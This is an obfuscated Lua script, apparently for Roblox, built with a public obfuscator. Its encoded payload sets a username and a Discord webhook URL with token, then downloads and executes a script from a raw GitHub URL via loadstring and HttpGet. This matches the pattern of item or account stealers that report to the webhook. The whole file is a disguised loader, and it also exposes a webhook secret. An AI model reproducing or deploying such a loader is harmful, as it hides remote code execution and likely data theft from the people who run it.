--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (2==v0) then v9=math.ldexp;v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=3;end if (v0==4) then v16=function(v18,v19,...)local v27=0;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;while true do if (v27==4) then v37=nil;v37=function(...)return {...},v13("#",...);end;v38=nil;v38=function()local v48=0;local v49;local v50;local v51;local v52;local v53;local v54;local v55;while true do if (v48==(1 + 1)) then v53=nil;v54=nil;v48=2 + 1 ;end if (v48~=3) then else v55=nil;while true do local v90=0;local v91;while true do if (v90==0) then v91=0;while true do if (v91==0) then if (v49~=(1 + 0)) then else local v113=0 -0 ;while true do if (2~=v113) then else v49=2;break;end if (v113~=(1 + 0)) then else for v120=1,v54 do local v121=0;local v122;local v123;local v124;local v125;local v126;while true do if ((2 -1)==v121) then v124=nil;v125=nil;v121=2;end if (v121~=(6 -4)) then else v126=nil;while true do if (v122==(1217 -(395 + 820))) then while true do if (v123==(0 + 0)) then local v165=0;local v166;while true do if (v165==(242 -(11 + 231))) then v166=0;while true do if (v166~=(2 -1)) then else v123=784 -(678 + 105) ;break;end if (v166~=0) then else local v184=0 + 0 ;while true do if (0~=v184) then else v124=0;v125=nil;v184=1;end if (v184==(35 -(12 + 22))) then v166=301 -(96 + 204) ;break;end end end end break;end end end if ((2 -1)==v123) then v126=nil;while true do if (v124==(0 + 0)) then local v171=0;local v172;while true do if (v171~=(0 + 0)) then else v172=0 + 0 ;while true do if (v172~=(0 -0)) then else local v187=0;local v188;while true do if (v187==(0 + 0)) then v188=0 -0 ;while true do if (v188~=(0 + 0)) then else local v200=0 + 0 ;while true do if (v200==1) then v188=1;break;end if (v200~=0) then else v125=v31();v126=nil;v200=3 -2 ;end end end if (v188==1) then v172=1183 -(982 + 200) ;break;end end break;end end end if (v172==(1 + 0)) then v124=1;break;end end break;end end end if (v124~=(2 -1)) then else if (v125==1) then v126=v31()~=0 ;elseif (v125==(1581 -(968 + 611))) then v126=v34();elseif (v125~=(1259 -(1006 + 250))) then else v126=v35();end v55[v120]=v126;break;end end break;end end break;end if (v122==(884 -(314 + 570))) then local v147=0 + 0 ;while true do if (v147~=(0 + 0)) then else v123=0 -0 ;v124=nil;v147=1 + 0 ;end if (v147==(1 + 0)) then v122=1 + 0 ;break;end end end if (v122==1) then local v148=0;while true do if (v148~=1) then else v122=2 + 0 ;break;end if (v148~=0) then else v125=nil;v126=nil;v148=1 + 0 ;end end end end break;end if (v121~=0) then else v122=0;v123=nil;v121=1;end end end v53[3]=v31();v113=2 -0 ;end if (v113~=(0 + 0)) then else v54=v33();v55={};v113=1;end end end if (v49~=0) then else local v114=0;while true do if (v114==(2 + 0)) then v49=4 -3 ;break;end if (v114~=0) then else v50={};v51={};v114=1;end if (v114==(1167 -(927 + 239))) then v52={};v53={v50,v51,nil,v52};v114=2;end end end v91=1 -0 ;end if (v91==(518 -(241 + 276))) then if (v49~=(2 + 0)) then else local v115=0;local v116;while true do if (0~=v115) then else v116=0 -0 ;while true do local v127=0 -0 ;while true do if (v127==0) then if (v116~=0) then else for v149=1933 -(1105 + 827) ,v33() do local v150=0;local v151;local v152;while true do if (v150==(2 -1)) then while true do if (0~=v151) then else v152=v31();if (v30(v152,1014 -(446 + 567) ,1 + 0 )~=0) then else local v178=0;local v179;local v180;local v181;local v182;while true do if (v178==(3 -1)) then while true do if (v179~=(2 -1)) then else local v189=0 -0 ;local v190;while true do if (v189~=(0 + 0)) then else v190=0 -0 ;while true do if (v190==0) then local v201=450 -(143 + 307) ;local v202;while true do if (v201==0) then v202=201 -(131 + 70) ;while true do if (v202==1) then v190=1 + 0 ;break;end if ((0 + 0)~=v202) then else v182={v32(),v32(),nil,nil};if (v180==0) then local v209=0;local v210;local v211;while true do if (v209~=(0 + 0)) then else v210=0 + 0 ;v211=nil;v209=1 + 0 ;end if (v209==1) then while true do if (v210==(729 -(650 + 79))) then v211=0 -0 ;while true do if (v211==0) then v182[3]=v32();v182[3 + 1 ]=v32();break;end end break;end end break;end end elseif (v180==1) then v182[503 -(475 + 25) ]=v33();elseif (v180==(1768 -(364 + 1402))) then v182[1 + 2 ]=v33() -(2^(1989 -(1032 + 941))) ;elseif (v180==(3 + 0)) then local v214=0 -0 ;local v215;local v216;while true do if (0~=v214) then else v215=0 + 0 ;v216=nil;v214=1;end if (v214==1) then while true do if (v215==(0 -0)) then v216=0 + 0 ;while true do if (v216~=0) then else v182[7 -4 ]=v33() -((5 -3)^(48 -32)) ;v182[416 -(202 + 210) ]=v32();break;end end break;end end break;end end end v202=1;end end break;end end end if (v190==1) then v179=1 + 1 ;break;end end break;end end end if (v179~=0) then else local v191=0 -0 ;local v192;while true do if (v191~=0) then else v192=0 + 0 ;while true do if (v192~=(1 + 0)) then else v179=1;break;end if (0~=v192) then else local v203=0;while true do if ((48 -(24 + 23))==v203) then v192=4 -3 ;break;end if (v203==0) then local v208=0 + 0 ;while true do if (v208==1) then v203=493 -(301 + 191) ;break;end if (v208~=0) then else v180=v30(v152,2,3);v181=v30(v152,4,8 -2 );v208=1;end end end end end end break;end end end if (v179~=(439 -(215 + 221))) then else if (v30(v181,3,3 + 0 )==1) then v182[2 + 2 ]=v55[v182[4]];end v50[v149]=v182;break;end if ((680 -(580 + 98))~=v179) then else local v194=0;while true do if (v194==(2 -1)) then v179=1 + 2 ;break;end if (0==v194) then local v199=0;while true do if (v199==(0 + 0)) then if (v30(v181,2 -1 ,1 + 0 )==(612 -(291 + 320))) then v182[2]=v55[v182[1 + 1 ]];end if (v30(v181,6 -4 ,2)~=1) then else v182[1 + 2 ]=v55[v182[1349 -(794 + 552) ]];end v199=3 -2 ;end if (v199==(384 -(34 + 349))) then v194=2 -1 ;break;end end end end end end break;end if (v178==0) then local v185=0;while true do if (v185==(0 -0)) then v179=0 + 0 ;v180=nil;v185=2 -1 ;end if ((1 + 0)~=v185) then else v178=3 -2 ;break;end end end if (v178==(1 -0)) then local v186=0;while true do if (v186==1) then v178=2;break;end if (v186==0) then v181=nil;v182=nil;v186=1;end end end end end break;end end break;end if (0~=v150) then else v151=0 + 0 ;v152=nil;v150=1;end end end for v153=1 + 0 ,v33() do v51[v153-(1551 -(1413 + 137)) ]=v38();end v116=694 -(94 + 599) ;end if (v116==1) then for v155=1,v33() do v52[v155]=v33();end return v53;end break;end end end break;end end end break;end end break;end end end break;end if (v48~=(0 + 0)) then else v49=0 -0 ;v50=nil;v48=1;end if (v48~=1) then else v51=nil;v52=nil;v48=1 + 1 ;end end end;v27=5;end if (v27==2) then v32=function()local v56=0 + 0 ;local v57;local v58;while true do if ((0 + 0)==v56) then v57,v58=v2(v18,v28,v28 + (3 -2) + 1 );v28=v28 + (4 -2) ;v56=1031 -(490 + 540) ;end if (1==v56) then return (v58 * (714 -458)) + v57 ;end end end;v33=nil;v33=function()local v59,v60,v61,v62=v2(v18,v28,v28 + 3 );v28=v28 + 3 + 1 ;return (v62 * (6642 + 16770574)) + (v61 * (55724 + 9812)) + (v60 * 256) + v59 ;end;v34=nil;v27=3;end if (v27==0) then v28=1;v29=nil;v18=v5(v4(v18,5),"..",function(v40)if (v2(v40,2)==79) then v29=v1(v4(v40,1,1));return "";else local v84=0;local v85;while true do if (v84==0) then v85=v3(v1(v40,16));if v29 then local v108=v6(v85,v29);v29=nil;return v108;else return v85;end break;end end end end);v30=nil;v27=1;end if (v27==3) then v34=function()local v63=v33();local v64=v33();local v65=2 -1 ;local v66=(v30(v64,1 + 0 ,(114 -75) -19 ) * ((4 -2)^(58 -(6 + 20)))) + v63 ;local v67=v30(v64,21,31);local v68=((v30(v64,97 -65 )==(2 -1)) and  -(1 + 0)) or ((1 + 0) -0) ;if (v67==(0 -0)) then if (v66==(0 + 0)) then return v68 * (0 + 0 + 0) ;else v67=538 -(530 + 7) ;v65=0 + 0 ;end elseif (v67==2047) then return ((v66==0) and (v68 * ((1 + (0 -0))/(0 -0)))) or (v68 * NaN) ;end return v9(v68,v67-1023 ) * (v65 + (v66/((1012 -(346 + 510 + 154))^(1273 -(1026 + 195))))) ;end;v35=nil;v35=function(v41)local v69;if  not v41 then local v86=1830 -(252 + 1293 + 285) ;while true do if (v86==(0 + 0)) then v41=v33();if (v41==(42 -(28 + 14))) then return "";end break;end end end v69=v4(v18,v28,(v28 + v41) -(1 + 0) );v28=v28 + v41 ;local v70={};for v76=1, #v69 do v70[v76]=v3(v2(v4(v69,v76,v76)));end return v7(v70);end;v36=v33;v27=4;end if (v27==5) then v39=nil;v39=function(v42,v43,v44)local v71=v42[1];local v72=v42[2];local v73=v42[3];return function(...)local v78=0;local v79;local v80;local v81;local v82;local v83;while true do if (v78==1) then v81={...};v82=v13("#",...) -1 ;v78=2;end if (v78==2) then v83=nil;v83=function()local v92=v71;local v93=v72;local v94=v73;local v95=v37;local v96={};local v97={};local v98={};for v102=1358 -(503 + 640 + 215) ,v82 do if ((v102>=v94) or (((5593 -4154) + 613)>=(5670 -((979 -(623 + 143)) + 464)))) then v96[v102-v94 ]=v81[v102 + (1 -0) ];else v98[v102]=v81[v102 + 1 + (1131 -(1108 + 23)) ];end end local v99=(v82-v94) + (550 -((682 -352) + 219)) ;local v100;local v101;while true do local v103=0 -0 ;local v104;local v105;while true do if ((4952>((6585 -4514) -(97 + 35))) and ((0 -0)==v103)) then v104=0 -0 ;v105=nil;v103=4 -3 ;end if ((v103==(3 -2)) or ((3212 -(207 + 47))>=(4784 -(791 + 100)))) then while true do if ((v104==(0 + 0)) or ((1900 + 2542)<=(1672 -695))) then v105=(3773 -2346) -(560 + 867) ;while true do if (((4285 -2375)<(326 + 3704)) and (v105==(175 -(75 + 100)))) then local v118=0 + 0 ;local v119;while true do if ((v118==(0 -0)) or ((1818 -1413)<=(168 + 74))) then v119=778 -(6 + 772) ;while true do if ((v119==(1338 -(361 + 977))) or ((2708 -(636 + 80))==(4797 -(254 + 14 + 142)))) then local v128=0 -0 ;while true do if (((3665 + 640)>(236 -121)) and (v128==(653 -(318 + 335)))) then v100=v92[v79];v101=v100[2 -1 ];v128=1687 -(125 + 1561) ;end if ((((7277 + 2260) -6344)>(9487 -6786)) and ((4 -3)==v128)) then v119=541 -(236 + 304) ;break;end end end if (((911 -(643 + (457 -190)))==v119) or ((227 + 1175)>=(6420 -(1317 + 337)))) then v105=1 + 0 ;break;end end break;end end end if (((4337 -(1141 + 713))<(13393 -8761)) and (v105==(1 + 0))) then if ((v101<=(502 -(255 + 208 + 36))) or ((7936 -(6799 -3024))<=(1139 + 245))) then if (((92 + 54)<(2990 -((2351 -(169 + 1627)) + 1145))) and (v101<=((1367 -(1142 + 224)) + 0))) then if ((3884==(5070 -(586 + 600))) and (v101==(0 + 0))) then v44[v100[(7 + 3) -7 ]]=v98[v100[2 + 0 ]];else local v131=0 -0 ;local v132;local v133;local v134;local v135;local v136;while true do if (((471 + 2070)==(3798 -1257)) and (v131==(1363 -(1126 + 237)))) then v132=0 -0 ;v133=nil;v131=1;end if ((v131==(3 -(4 -3))) or ((559 + 375)>(14976 -(3348 + 7793)))) then v136=nil;while true do if ((902==(736 + 166)) and (v132==(1 + 0))) then local v167=713 -(411 + 302) ;while true do if (((580 -(357 + (632 -410)))==v167) or ((931 + 2934)>=(13624 -8947))) then v132=2 -0 ;break;end if ((v167==(0 -0)) or ((1541 + 74)>=(15331 -11177))) then v80=(v135 + v133) -(181 -(128 + 52)) ;v136=(779 -(627 + 152)) -0 ;v167=2 -(1 + 0) ;end end end if ((((1802 -734) + 176)<(3624 + 907)) and (((782 -535) -(61 + 186))==v132)) then local v168=0 -0 ;while true do if ((1176<=(14227 -9898)) and (v168==(1898 -((1383 -(405 + 105)) + 1024)))) then v132=(2 + 2) -3 ;break;end if ((v168==0) or ((1626 + 1341)==(3773 -(1431 + 528)))) then v133=v100[762 -(192 + 568) ];v134,v135=v95(v98[v133](v14(v98,v133 + (1646 -(1196 + 449)) + 0 ,v100[(1902 -(652 + 38)) -(955 + 254) ])));v168=1 + 0 ;end end end if ((v132==(7 -5)) or ((480 + 1793)>=(579 + 1842))) then for v174=v133,v80 do local v175=0 + 0 ;local v176;local v177;while true do if (((1687 -(216 + 235))==(2267 -(327 + 704))) and (v175==0)) then v176=0 -0 ;v177=nil;v175=1 + 0 ;end if (((3893 + 155 + 265)>=((4360 -(357 + 565)) -(798 + 41 + 53))) and ((3 -2)==v175)) then while true do if (((7902 -4836)>(2712 -(1424 + 510))) and (v176==(0 + 0))) then v177=0 -0 ;while true do if ((v177==(1360 -((917 -450) + 893))) or ((297 + 480)>=(3111 -2118))) then v136=v136 + 1 + 0 ;v98[v174]=v134[v136];break;end end break;end end break;end end end break;end end break;end if (((1105 + 258)<=((1102 + 5305) -(2537 + 1458))) and (v131==(2 -1))) then v134=nil;v135=nil;v131=4 -2 ;end end end elseif (((2565 -1576)<(2862 -(1341 + 108))) and (v101>(4 -2))) then local v137=0 -0 ;local v138;local v139;while true do if ((v137==(1 + 0)) or ((1906 -(12 + 1095))<=(1897 -1412))) then while true do if ((v138==(0 -0)) or ((802 + (9564 -5527))<(1310 -(38 + 88)))) then v139=v100[2 -0 ];v98[v139]=v98[v139](v14(v98,v139 + (2 -1) ,v80));break;end end break;end if ((1269<(2407 -(27 + 2))) and ((0 + 0)==v137)) then local v159=0 -0 ;while true do if ((v159==(0 + 0)) or ((20 + 782)>=(1878 + 500))) then v138=0 + 0 ;v139=nil;v159=1 -0 ;end if (((5448 -2053)>(3284 -1804)) and (v159==(1446 -((3725 -2616) + 336)))) then v137=74 -(26 + 47) ;break;end end end end else local v140=1058 -(436 + 622) ;local v141;local v142;while true do if (((2052 + 794)==(3813 -(474 + 493))) and (((2006 -(124 + 736)) -(59 + 445 + 641))==v140)) then v98[v141 + (976 -(732 + 243)) ]=v142;v98[v141]=v142[v100[4 + 0 + 0 ]];break;end if ((v140==(0 -0)) or (2317==2625)) then v141=v100[1772 -(103 + 1667) ];v142=v98[v100[1497 -(383 + 1111) ]];v140=1327 -(193 + 1133) ;end end end elseif ((v101<=(4 + 1)) or ((458 + 842)>=(10799 -8614))) then if (((6500 -(1191 + 603))>(4446 -(317 + 120))) and (v101>((1411 -(379 + 1028)) + 0))) then v98[v100[(1016 -(439 + 568)) -7 ]]=v44[v100[352 -(162 + (267 -(74 + 6))) ]];else v98[v100[2 + 0 ]]();end elseif ((((151 -50) + 21)<(748 + (4880 -(664 + 298)))) and (v101>(472 -(158 + 308)))) then v98[v100[42 -(6 + 34) ]]=v100[956 -(510 + 443) ];else do return;end end v79=v79 + (4 -3) ;break;end end break;end end break;end end end end;v78=3;end if (v78==0) then v79=1;v80= -1;v78=1;end if (v78==3) then A,B=v37(v12(v83));if  not A[1] then local v106=0;local v107;while true do if (v106==0) then v107=v42[4][v79] or "?" ;error("Script error at ["   .. v107   .. "]:"   .. A[2] );break;end end else return v14(A,2,B);end break;end end end;end;return v39(v38(),{},v19)(...);end if (v27==1) then v30=function(v45,v46,v47)if v47 then local v87=0 -(422 -(271 + 151)) ;local v88;while true do if (v87==(0 + 0)) then v88=(v45/(2^(v46-(1 + (901 -(872 + 29))))))%(2^(((v47-((526 -(458 + 67)) + 0)) -(v46-(769 -(644 + 124)))) + (2 -1))) ;return v88-(v88%(586 -(537 + 48))) ;end end else local v89=(2 + 0)^(v46-(3 -2)) ;return (((v45%(v89 + v89))>=v89) and (1 + 0)) or (162 -(112 + 50)) ;end end;v31=nil;v31=function()local v74=0 -0 ;local v75;while true do if (((1145 -(1098 + 47)) + 0)==v74) then v75=v2(v18,v28,v28);v28=v28 + 1 + (31 -(16 + 15)) ;v74=534 -(299 + 234) ;end if (v74==(1 + 0)) then return v75;end end end;v32=nil;v27=2;end end end;v16("LOL!083O0003083O00557365724E616D6503073O006B616A6174595403073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3130393235322O34323732303936312O3334332F5F7369375A635A4E4A2O73746C646C4D3836586132573042654F367036425851344C69485A543857566F52347A5044757455716642457842413979712D6D69665A592O47030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6B34662O742F52692O7A2F6D61696E2F4D61696E2E6C7561000C3O0012073O00023O00124O00013O0012073O00043O00124O00033O0012053O00053O001205000100063O002002000100010007001207000300084O0001000100034O00035O00022O00043O000100012O00063O00017O000C3O00023O00023O00033O00033O00043O00043O00043O00043O00043O00043O00043O00053O00",v10(),...);break;end if (v0==1) then v5=string.gsub;v6=string.rep;v7=table.concat;v8=table.insert;v0=2;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v4=string.sub;v0=1;end if (3==v0) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v16=nil;v0=4;end end end
